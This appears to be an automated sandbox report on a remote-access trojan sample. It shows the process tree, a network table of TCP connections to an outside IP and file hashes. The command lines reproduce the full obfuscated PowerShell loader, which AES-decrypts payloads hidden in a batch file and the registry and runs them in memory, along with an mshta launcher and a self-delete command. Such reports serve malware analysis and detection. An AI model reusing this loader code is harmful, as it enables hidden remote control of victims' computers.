"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d490fd13-03bc-43de-899e-2e1d4c594870}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{5bceada9-83a7-4a7b-b04b-6941595c7e5c}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{62105ef6-29fa-467e-b9a5-81419faa8537}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e7bc4198-1eea-4999-9025-1b21a802bc4a}
C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3140).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e0c64e4a-e289-446b-9b62-aad49c20761f}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{ab669555-1861-4cd5-bb82-f900b9024d77}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{8782712f-e10f-41c5-8d5c-e2d4b98f5c50}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{f340cd86-ca5c-45a4-bf7d-667d6f3d75af}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a80c228b-076e-4481-bbab-32b4da8f515b}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{31e4bd32-ecb1-447b-ba19-fb7c88d83439}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ab2103d1-5466-41e7-b63d-5f2f340b56a3}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{519bd706-2191-4464-9c0e-f597a8cfe5c9}
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1788 -ip 1788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 480
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2bc96821-fb4e-4a02-b1d2-b9a3808fcc98}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 640 -p 5172 -ip 5172
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5172 -s 416
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{109c5d41-12cb-47d9-94d2-123258ce61c2}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{b5dcbc06-7a0e-4b61-98f3-555610136be3}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{61efd6de-ac99-456f-9f47-e74f02889d8a}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 3140 -ip 3140
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3140 -s 1096
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
PING localhost -n 8
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2fadd490-4a00-4232-a576-3ab452933281}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{780e673d-6db3-4954-ae44-c01d58bd29e4}
Network
| Country | Destination | Domain | Proto |
| FR | 163.5.215.216:4782 | | tcp |
| FR | 163.5.215.216:4782 | | tcp |
Files
memory/1656-0-0x00007FF8E4EC3000-0x00007FF8E4EC5000-memory.dmp
memory/1656-1-0x000001F0D2ED0000-0x000001F0D308E000-memory.dmp
memory/1656-2-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/1656-3-0x000001F0EE780000-0x000001F0EE860000-memory.dmp
memory/1656-4-0x000001F0EEA40000-0x000001F0EEBE6000-memory.dmp
memory/1656-5-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/1656-6-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/3112-15-0x000001E9C6DF0000-0x000001E9C6E12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqhyqas2.ynr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3112-16-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/3112-17-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/3112-18-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/3112-19-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | 0e9ccd796e251916133392539572a374 |
| SHA1 | eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204 |
| SHA256 | c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221 |
| SHA512 | e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d |
memory/1656-32-0x00007FF8E4EC3000-0x00007FF8E4EC5000-memory.dmp
memory/1656-33-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/1656-34-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/3112-35-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
